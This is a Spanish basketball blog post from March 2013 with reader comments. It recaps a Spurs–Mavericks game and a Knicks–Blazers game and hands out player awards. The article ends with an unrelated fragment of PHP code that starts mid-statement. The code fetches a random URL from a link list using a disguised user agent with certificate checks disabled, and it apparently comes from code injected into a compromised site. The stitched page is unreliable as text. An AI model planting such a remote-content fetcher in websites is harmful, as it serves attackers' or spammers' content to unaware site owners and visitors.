La Crónica: Tim “Siglo XXV” Duncan

15 de March de 2013 por Viva_Dirk

En el primero de los 2 partidos de la pasada madrugada no pude evitar acordarme de la célebre expresión de Andrés Montes y pensé que Duncan es capaz de hacer que incluso se quedase corto. A poco más de un mes de cumplir 37 años, el 21 de los Spurs nos dejó otra actuación para el recuerdo. Sus 28 puntos y 19 rebotes con un 60% en tiros de campo son más propios de cualquier jovenzuelo ansioso por demostrar su valía que de toda una leyenda que tiene que preocuparse de poco más que de llegar en buenas condiciones para playoffs. Para Tim ganar es ganar. No me lo imagino flipando con su actuación individual sino pensando que ha hecho el trabajo que le tocaba hoy, de la misma que lo hace cuando tiene que anotar 8 puntos y amargarle la vida a cualquier ala pívot estrella de la liga.

Enfrente otro viejo rockero eclipsado por Tim… como buena parte de su carrera. Nowitzki hizo un inteligentísimo partido, de menos a más, poniendo a su equipo a un punto de la victoria a falta de 28 segundos. La bola final fue para Carter que falló, tonica general de su partido ayer. Buena aportación del banco de los Mavs y decepcionante actuación de OJ Mayo (91-92).

En la visita de los Knicks a Portland sin Carmelo disfrutamos de un emocionante partido. En la primera mitad los Knicks llegaron a mandar 48-38 a falta de 3 minutos para el descanso, liderados por ? ¡mucha atención! ? Kenyon Martin y Marcus Camby. Llegaban a ese momento de partido con un 64% de acierto en tiros de campo y un rebote ofensivo concedido. Pero tras un tiempo muerto de Stotts, parcial de 13-0 para los Blazers con 4 canastas del juego interior y un Lillard que se atrevía con todo. En la segunda parte dominio local, liderados por el dúo Lillard&Aldridge, muy bien secundados por el resto de componentes del banco, mientras que los Knicks no encontraban vías de anotación más allá de JR Smith (90-105).


PREMIOS

MVP: Bestial actuación de Tim Duncan que parece tener el secreto de la eterna juventud (28 puntos y 19 rebotes con un 12 de 20 en tiros). En el caso de Damian Lillard lo que parece tener es una veteranía natural fuera de lo común. Acabó el partido con 26 puntos y 10 asistencias, con un 11 de 18 en tiros.

Rookie: Lillard no tiene rival ya para el ROY.

Sorpresa: En ausencia de Tyson Chandler, Marcus Camby anotó 8 puntos, capturó 10 rebotes y dio 3 asistencias en 19 minutos de juego.

Decepción: OJ Mayo no estuvo a la altura contra los Spurs, 10 puntos es poca cosa para alguien de su talento. Tampoco podemos decir nada bueno del 1 de 8 en tiros de Jason Kidd.

Esfuerzo en vano: 21 puntos, 11 rebotes, 3 asistencias y 3 robos no bastan si te encuentras con Tim Duncan. A Dirk Nowitzki le sonará la historia. En Portland, JR Smith se fue hasta los 33 puntos.

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Vaya camiseta de los Blazers ¿no? Más del estilo FIBA que de la NBA,me recuerda a la del Kinder de Bolonia.

      Citar

  2. MagicJohnson32 dice:
    #2

    Ruxixón:
    Vaya camiseta de los Blazers ¿no? Más del estilo FIBA que de la NBA,me recuerda a la del Kinder de Bolonia.

    Me gusta, se parece a la de los 80-90.

    Qué grandes Duncan & Dirk. Old School Rules!!

      Citar

  3. Esteban dice:
    #3

    camby y martin podrian ser titulares validos en muchisimos equipos, y para saltar de banco son mas que exelentes

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>